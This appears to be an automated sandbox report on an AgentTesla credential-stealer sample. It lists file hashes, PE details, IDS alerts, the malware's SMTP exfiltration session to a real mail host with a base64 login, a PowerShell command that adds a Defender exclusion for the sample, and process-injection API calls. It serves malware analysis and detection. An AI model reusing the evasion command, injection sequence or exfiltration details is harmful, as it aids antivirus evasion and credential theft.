Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379736180876081
Encrypted: false
SSDEEP: 48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:tLHyIFKL3IZ2KRH9OugQs
MD5: BC26E51192391D79FF5E4FB3860340BE
SHA1: 62F2D1E8869932FCA182C35E8B6E72A5CB302424
SHA-256: A6595E121740E11B65911E8B843C9FF8AC4D20206D856FF6237FE4AAC6EDEDBA
SHA-512: C4090BDB623716FBE0AB732643DCE474D6774F327CF39D7E932A56F07FB45BFFE3925CCA62ABD0266034AFFB5AFB3982D6FFDB595C0A63E31B3568D0410C670C
Malicious: false
Reputation: low
Preview: @...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.980259346464504
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: order2024-10-07_174915.exe
File size: 573'440 bytes
MD5: 4351cdd212b361f999d8bfad8fceceee
SHA1: 34dc372ecb6165c1016b502c93657db789d31203
SHA256: 963574e90ebf7786aaf6a17966441068baeadbce658ddd2f19af9a9f3f34c7cc
SHA512: 540d1001d9e9cd82dc2db8b85cb1d5068707706a82e7cd68486fee7920a78718f991a28514c09d1b7683be8f0f3884293d6dfd05aeb8b531683909a61a1368e8
SSDEEP: 12288:Rf0WyyKslE29kc/4FWLjzyd/wdqs7V3+vy7ox15GUB:Ry291gW/ETwVOvJlG
TLSH: 9EC4239126ADCE36F478AFBCC892670103B20B6B2896C76F5C135C6F6763B0C034569B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................... ............@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x48d502
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67038D99 [Mon Oct 7 07:28:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d4ae | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x5a4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x90000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8beb4 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8b508 | 0x8b600 | 68bcbeffd4846372e24f8b8ea970e8e7 | False | 0.9827056474215247 | data | 7.985572066441394 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8e000 | 0x5a4 | 0x600 | 0bfa7d1b0ebd753890333fcd5e3328ce | False | 0.4205729166666667 | data | 4.070248079867378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x90000 | 0xc | 0x200 | 8b0c8c27b31ba8165993d8aaba123640 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x8e090 | 0x314 | data | | | 0.4365482233502538
RT_MANIFEST | 0x8e3b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T21:19:52.382003+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.7 | 49704 | 199.79.62.115 | 587 | TCP
2024-10-07T21:19:52.382003+0200 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.7 | 49704 | 199.79.62.115 | 587 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 21:18:12.357938051 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:12.362929106 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:12.363182068 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:12.976272106 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:12.976994991 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:12.981901884 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.128717899 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.129606009 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:13.134418964 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.281490088 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.282254934 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:13.287332058 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.537381887 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.537606001 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:13.542467117 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.689497948 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.689704895 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:13.694699049 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.855420113 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:13.855617046 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:13.861037016 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.007858038 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.008486986 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:14.008584976 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:14.008584976 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:14.008584976 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:18:14.013581038 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.013612986 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.013746977 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.013775110 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.263580084 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:18:14.308605909 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:19:52.028470039 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:19:52.033704996 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:19:52.381457090 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:19:52.381863117 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Oct 7, 2024 21:19:52.381937027 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:19:52.382003069 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115
Oct 7, 2024 21:19:52.386806965 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 21:18:12.018614054 CEST | 61465 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 21:18:12.346399069 CEST | 53 | 61465 | 1.1.1.1 | 192.168.2.7
Oct 7, 2024 21:18:39.410161018 CEST | 53 | 61405 | 162.159.36.2 | 192.168.2.7
Oct 7, 2024 21:18:39.913746119 CEST | 61431 | 53 | 192.168.2.7 | 1.1.1.1
Oct 7, 2024 21:18:39.941715002 CEST | 53 | 61431 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 21:18:12.018614054 CEST | 192.168.2.7 | 1.1.1.1 | 0x5e4c | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
Oct 7, 2024 21:18:39.913746119 CEST | 192.168.2.7 | 1.1.1.1 | 0x29ac | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 21:18:12.346399069 CEST | 1.1.1.1 | 192.168.2.7 | 0x5e4c | No error (0) | mail.mbarieservicesltd.com | | 199.79.62.115 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 21:18:39.941715002 CEST | 1.1.1.1 | 192.168.2.7 | 0x29ac | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 7, 2024 21:18:12.976272106 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Tue, 08 Oct 2024 00:48:12 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Oct 7, 2024 21:18:12.976994991 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | EHLO 745481
Oct 7, 2024 21:18:13.128717899 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 250-md-54.webhostbox.net Hello 745481 [8.46.123.33]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Oct 7, 2024 21:18:13.129606009 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
Oct 7, 2024 21:18:13.281490088 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 334 UGFzc3dvcmQ6
Oct 7, 2024 21:18:13.537381887 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 235 Authentication succeeded
Oct 7, 2024 21:18:13.537606001 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
Oct 7, 2024 21:18:13.689497948 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 250 OK
Oct 7, 2024 21:18:13.689704895 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
Oct 7, 2024 21:18:13.855420113 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 250 Accepted
Oct 7, 2024 21:18:13.855617046 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | DATA
Oct 7, 2024 21:18:14.007858038 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
Oct 7, 2024 21:18:14.008584976 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | .
Oct 7, 2024 21:18:14.263580084 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 250 OK id=1sxtFF-0034jN-2z
Oct 7, 2024 21:19:52.028470039 CEST | 49704 | 587 | 192.168.2.7 | 199.79.62.115 | QUIT
Oct 7, 2024 21:19:52.381457090 CEST | 587 | 49704 | 199.79.62.115 | 192.168.2.7 | 221 md-54.webhostbox.net closing connection

                                                Target ID:0
                                                Start time:15:18:07
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0xe60000
                                                File size:573'440 bytes
                                                MD5 hash:4351CDD212B361F999D8BFAD8FCECEEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0x4c0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0x270000
                                                File size:573'440 bytes
                                                MD5 hash:4351CDD212B361F999D8BFAD8FCECEEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0xaf0000
                                                File size:573'440 bytes
                                                MD5 hash:4351CDD212B361F999D8BFAD8FCECEEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:11
                                                Start time:15:18:11
                                                Start date:07/10/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff7fb730000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:10.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:172
                                                  Total number of Limit Nodes:6
                                                  execution_graph (rendered graph omitted; only the functions and API calls named in it are listed here, with the in-memory addresses the graph gives)
                                                  • 7aa60ab -> 7aa730a / 7aa737e / 7aa7318 -> dispatch to 7aa774e, 7aa77db, 7aa7866, 7aa78b2, 7aa792c, 7aa79b6, 7aa79e8, 7aa7a3d, 7aa7b46, 7aa7c46, 7aa7e3f, 7aa7eff, 7aa8087
                                                  • 7aa5c6c / 7aa5c78: CreateProcessA (at 7aa5e66), reached from 7aa774e and 7aa77db
                                                  • 7aa592b / 7aa5930: VirtualAllocEx (at 7aa5930 / 7aa5970), reached from 7aa7eff
                                                  • 7aa59e8 / 7aa59f0: WriteProcessMemory (at 7aa59f0 / 7aa5a38), reached from 7aa78b2, 7aa792c, 7aa7a3d and 7aa7e3f
                                                  • 7aa5ad8 / 7aa5ae0: ReadProcessMemory (at 7aa5ae0 / 7aa5b2b), reached from 7aa79b6 and 7aa8087
                                                  • 7aa5853 / 7aa5858: Wow64SetThreadContext (at 7aa5858 / 7aa589d), reached from 7aa7b46 and 7aa7c46
                                                  • 7aa57a0 / 7aa57a8: ResumeThread (at 7aa57a8 / 7aa57e8), reached from 7aa79e8 and 7aa7866
                                                  • 165cfe0: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                                  • 165d630: DuplicateHandle
                                                  • 165ac50 -> 165ad38 / 165ad48 -> 165af80: GetModuleHandleW
                                                  • 7aa8640 -> 7aa6aa4 -> 7aa88c0: PostMessageW
                                                  • 1654668 -> 1654778 -> 1654878 / 1654888 -> 16544b0 -> 1655918: CreateActCtxA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f61b873236b15fc8d9b1aebba8c5bcedf182b6ada2845b7512e6d7a0a90539d
                                                  • Instruction ID: 32b6debc951e94c6f74b6e70a227f0e1b83eedd62ef2bb50c50ae0ecc8ecbd19
                                                  • Opcode Fuzzy Hash: 4f61b873236b15fc8d9b1aebba8c5bcedf182b6ada2845b7512e6d7a0a90539d
                                                  • Instruction Fuzzy Hash: 7EE1EAB0B01605AFEB29DBB5C850BAFB7FAAFC9600F14446DD166DB290CB34E801CB51

                                                  Control-flow Graph

                                                  control_flow_graph (rendered graph omitted): function at 5907aa8, basic blocks 5907aa8 to 5907c8f, no API calls in the graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq$LRq$$q$$q$$q$$q
                                                  • API String ID: 0-1198634162
                                                  • Opcode ID: 516b86588ccf810f620566e29fd72048116b0d1ad19bacb9ed896a505a9f7e28
                                                  • Instruction ID: fe435fac43e8065d09e76ddb6477d5e4630986385e9e426209135d44ca6cbd92
                                                  • Opcode Fuzzy Hash: 516b86588ccf810f620566e29fd72048116b0d1ad19bacb9ed896a505a9f7e28
